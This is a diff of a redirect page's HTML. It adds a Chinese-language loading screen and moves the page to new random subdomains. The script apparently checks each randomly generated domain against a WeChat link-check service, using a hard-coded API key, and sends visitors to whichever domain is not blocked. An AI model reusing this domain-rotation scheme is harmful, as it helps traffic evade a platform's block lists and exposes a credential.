--- a/index.html
+++ b/index.html
@@ -3,51 +3,131 @@
 
 <head>
   <meta charset="UTF-8">
-  <title>Random Sub - Domain Redirect</title>
+  <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- 添加视口元标签 -->
+  <title>正在努力为您分配线路，请稍等</title>
+  <style>
+    /* Basic styles for the loading screen */
+    body {
+      display: flex;
+      justify-content: center;
+      align-items: center;
+      height: 100vh;
+      margin: 0;
+      font-family: Arial, sans-serif;
+      background-color: #e0f7fa; /* Light teal background */
+      color: #333;
+      position: relative;
+      padding: 10px; /* 在小屏幕上增加内边距 */
+    }
+
+    .loading {
+      display: flex;
+      flex-direction: column;
+      align-items: center;
+      text-align: center;
+      padding: 20px;
+      border-radius: 15px;
+      background: rgba(255, 255, 255, 0.9); /* White background with some transparency */
+      box-shadow: 0 4px 30px rgba(0, 0, 0, 0.1);
+      max-width: 90%; /* 最大宽度设置为90% */
+      margin: 0 auto; /* 居中 */
+    }
+
+    .spinner {
+      width: 15vw; /* 使用相对单位 */
+      height: 15vw; /* 使用相对单位 */
+      border: 8px solid transparent;
+      border-top: 8px solid #3498db;
+      border-right: 8px solid #e74c3c;
+      border-bottom: 8px solid #f1c40f;
+      border-left: 8px solid #2ecc71;
+      border-radius: 50%;
+      animation: rotate 1s linear infinite;
+      margin-bottom: 20px;
+    }
+
+    @keyframes rotate {
+      0% { transform: rotate(0deg); }
+      100% { transform: rotate(360deg); }
+    }
+
+    h1 {
+      font-size: 4vw; /* 使用相对单位 */
+      margin: 10px 0;
+      font-weight: 600; /* Bold text */
+      color: #00796b; /* Teal color */
+    }
+
+    p {
+      font-size: 3vw; /* 使用相对单位 */
+      color: #555; /* Darker grey for contrast */
+    }
+
+    /* Adding a background animation */
+    .background-animation {
+      position: absolute;
+      top: 0;
+      left: 0;
+      width: 100%;
+      height: 100%;
+      background: url('https://www.transparenttextures.com/patterns/white-paper-1.png'); /* Subtle texture */
+      opacity: 0.5;
+      z-index: -1; /* Place behind the loading indicator */
+    }
+  </style>
 </head>
 
 <body>
-<script>
-  // 生成两位随机字符的函数
-  function getRandomTwoChars() {
-    var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';
-    var result = '';
-    for (var i = 0; i < 2; i++) {
-      var randomIndex = Math.floor(Math.random() * chars.length);
-      result += chars[randomIndex];
+  <div class="background-animation"></div>
+<div class="loading" id="loading">
+    <div class="spinner"></div>
+    <h1>正在努力为您分配线路，请稍等</h1>
+    <p>我们正在为您寻找最佳连接...</p>
+    <p style="color: red; margin-top: 10px; font-size: 3vw;">如长时间未跳转，请使用浏览器打开本页面</p>
+</div>
+
+
+  <script>
+    // 生成两位随机字符的函数
+    function getRandomTwoChars() {
+      var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';
+      var result = '';
+      for (var i = 0; i < 2; i++) {
+        var randomIndex = Math.floor(Math.random() * chars.length);
+        result += chars[randomIndex];
+      }
+      return result;
     }
-    return result;
-  }
 
-  // 检测域名是否有效的函数
-  function checkDomain(url) {
-    fetch(url)
-      .then(response => response.json())
-      .then(data => {
-        if (data.Code === "102") {
-          // 如果返回的信息是102，则跳转到该域名
-          window.location.href = decodeURIComponent(data.Data);
-        } else if (data.Code === "002") {
-          // 如果返回的是002，则等待20秒再检测
-          setTimeout(() => {
-            var targetUrl = 'http://' + getRandomTwoChars() + '.kipiit.cn';
+    // 检测域名是否有效的函数
+    function checkDomain(url) {
+      fetch(url)
+        .then(response => response.json())
+        .then(data => {
+          if (data.Code === "102") {
+            // 如果返回的信息是102，则跳转到该域名
+            window.location.href = decodeURIComponent(data.Data);
+          } else if (data.Code === "002") {
+            // 如果返回的是002，则等待20秒再检测
+            setTimeout(() => {
+              var targetUrl = 'http://' + getRandomTwoChars() + '.zpqbt.cn';
+              checkDomain('https://wx.rrbay.com/pro/wxUrlCheck2.ashx?key=ee8dd85eeacb68ec6f8f719386bf7544&url=' + encodeURIComponent(targetUrl));
+            }, 20000); // 20000毫秒 = 20秒
+          } else {
+            // 处理其他返回情况
+            var targetUrl = 'http://' + getRandomTwoChars() + '.zpqbt.cn';
             checkDomain('https://wx.rrbay.com/pro/wxUrlCheck2.ashx?key=ee8dd85eeacb68ec6f8f719386bf7544&url=' + encodeURIComponent(targetUrl));
-          }, 20000); // 20000毫秒 = 20秒
-        } else {
-          // 处理其他返回情况
-          var targetUrl = 'http://' + getRandomTwoChars() + '.kipiit.cn';
-          checkDomain('https://wx.rrbay.com/pro/wxUrlCheck2.ashx?key=ee8dd85eeacb68ec6f8f719386bf7544&url=' + encodeURIComponent(targetUrl));
-        }
-      })
-      .catch(error => {
-        console.error('检测域名时发生错误:', error);
-      });
-  }
+          }
+        })
+        .catch(error => {
+          console.error('检测域名时发生错误:', error);
+        });
+    }
 
-  // 开始检测域名
-  var targetUrl = 'http://' + getRandomTwoChars() + '.kipiit.cn';
-  checkDomain('https://wx.rrbay.com/pro/wxUrlCheck2.ashx?key=ee8dd85eeacb68ec6f8f719386bf7544&url=' + encodeURIComponent(targetUrl));
-</script>
+    // 开始检测域名并显示加载指示器
+    var targetUrl = 'http://' + getRandomTwoChars() + '.zpqbt.cn';
+    checkDomain('https://wx.rrbay.com/pro/wxUrlCheck2.ashx?key=ee8dd85eeacb68ec6f8f719386bf7544&url=' + encodeURIComponent(targetUrl));
+  </script>
 </body>
 
 </html>
